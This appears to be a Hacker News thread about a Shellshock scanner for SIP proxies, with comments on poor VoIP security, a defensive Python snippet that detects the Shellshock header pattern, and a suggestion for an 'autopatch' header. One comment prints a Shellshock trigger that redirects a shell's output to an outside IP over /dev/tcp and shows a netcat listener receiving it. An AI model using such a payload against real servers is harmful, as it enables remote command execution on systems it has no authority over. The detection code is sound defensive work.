A scanner for SIP proxies vulnerable to Shellshock - lzaf
https://github.com/zaf/sipshock

======
MichaelGG
This was my first thought when I heard of the bash issue. Hopefully someone
runs this with a noticeable payload (but not necessarily that malicious) to
help wake people up.

OTOH, every single SIP stack I've tested is vulnerable to IP spoofing (due to
the inane rules of SIP which make this attack very easy), yet IP auth is used
extensively as _the_ authentication system for wholesale VoIP traffic.

In addition, every VoIP system I've looked at as-a-whole has had all sorts of
other vulnerabilities. Easy stuff, too, like "SQL injection on login form
leading to full remote access to system". Vendors and customers pretty much
don't seem to understand or care. One CTO of a successful SIP-based product
said to me "Buffer overflows? That may be possible, but only if the network
was very, very fast." His software handles many, many calls, had accidental
remote backdoors, and is responsible for "securing" many many millions of
dollars of telecom a month.

The telecom mindset seems wholly incapable of dealing with an environment such
as the Internet.

But... end-user devices or "PBXes" have enough holes that attackers appear to
be content to "smash-and-grab" for the most part. It doesn't seem like
attackers are going after the "carriers" yet, although there's certainly
enough money involved that someone stealing, say, 1% of a company's total
volume would go unnoticed.

------
daveloyall
Plus one for this, which I'd never heard of!

    () { :;};exec >/dev/tcp/1.2.3.4/8080

In terminal A:

    hobbes@metalbaby:~$ nc -l -p 9999 -vv

In terminal B:

    hobbes@metalbaby:~$ exec >/dev/tcp/127.0.0.1/9999

Results:

    hobbes@metalbaby:~$ nc -l -p 9999 -vv
    listening on [any] 9999 ...
    connect to [127.0.0.1] from localhost [127.0.0.1] 43230

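The thread is about finding SIP proxies that hand request headers to a vulnerable bash, so the thing a defender most wants is a way to spot the Shellshock trigger in SIP traffic before it reaches a shell. The following is an added example written for this page; it is not code from the sipshock project or from any commenter. It parses the header block of a SIP request and flags any header whose value begins with the bash function-definition pattern `() {` that the CVE-2014-6271 trigger relies on. The two sample requests, the host names and the addresses are constructed for the example.

```python
import re
from typing import List, Tuple

# Signature of the Shellshock trigger: a header value that starts with a bash
# function definition, "() {", possibly after leading whitespace. This is a
# detection rule written for this example; adapt it to your own traffic.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def parse_sip_headers(message: str) -> List[Tuple[str, str]]:
    """Split a SIP request into (name, value) header pairs.

    Only the header block before the first blank line is examined; any body
    is ignored. Header names keep their original case; values are stripped.
    """
    head, _, _body = message.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: List[Tuple[str, str]] = []
    for line in lines[1:]:  # lines[0] is the request line (method, URI)
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue  # malformed header line, skip it
        headers.append((name.strip(), value.strip()))
    return headers


def find_shellshock_headers(message: str) -> List[Tuple[str, str]]:
    """Return every header whose value carries the Shellshock function pattern."""
    return [(name, value) for name, value in parse_sip_headers(message)
            if SHELLSHOCK_RE.search(value)]


def is_shellshock_probe(message: str) -> bool:
    """True if at least one header in the request matches the pattern."""
    return bool(find_shellshock_headers(message))


# Constructed sample requests (not captured traffic). The first carries the
# trigger pattern in User-Agent followed by a harmless command; the second is
# an ordinary OPTIONS ping from a phone.
SUSPICIOUS_REQUEST = (
    "OPTIONS sip:100@pbx.example.test SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 203.0.113.9:5060;branch=z9hG4bK-1\r\n"
    "From: <sip:scan@203.0.113.9>;tag=abc\r\n"
    "To: <sip:100@pbx.example.test>\r\n"
    "Call-ID: c1@203.0.113.9\r\n"
    "CSeq: 1 OPTIONS\r\n"
    "User-Agent: () { :;}; echo probe\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

BENIGN_REQUEST = (
    "OPTIONS sip:100@pbx.example.test SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.20:5060;branch=z9hG4bK-2\r\n"
    "From: <sip:101@pbx.example.test>;tag=def\r\n"
    "To: <sip:100@pbx.example.test>\r\n"
    "Call-ID: c2@192.0.2.20\r\n"
    "CSeq: 2 OPTIONS\r\n"
    "User-Agent: DeskPhone/3.1\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, msg in (("suspicious", SUSPICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        hits = find_shellshock_headers(msg)
        print(f"{label}: {'ALERT' if hits else 'ok'} {hits}")
```

The match is anchored at the start of the value because the vulnerability is in how bash imports a variable whose value begins with a function definition; a `() {` buried mid-value does not trigger it, so requiring the anchor keeps the false-positive rate low when this runs against proxy logs or a packet capture. A proxy that passes header values into environment variables for a bash CGI or AGI script is the configuration the scanner in the linked project is looking for, and this check is the matching detection on the receiving side.
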
------
xSwag
IMO there should be some sort of header like

    x-whitehat: autopatch

which gives white-hats the opportunity to patch your system without
exploiting. The way I see it, a malicious person is going to exploit your
server anyway. This way white-hats could patch your system and not be
prosecuted. With this, someone who discovered the patch could scan the
internet, look for servers that say "yes, please patch me" and deploy a quick
patch and nothing else.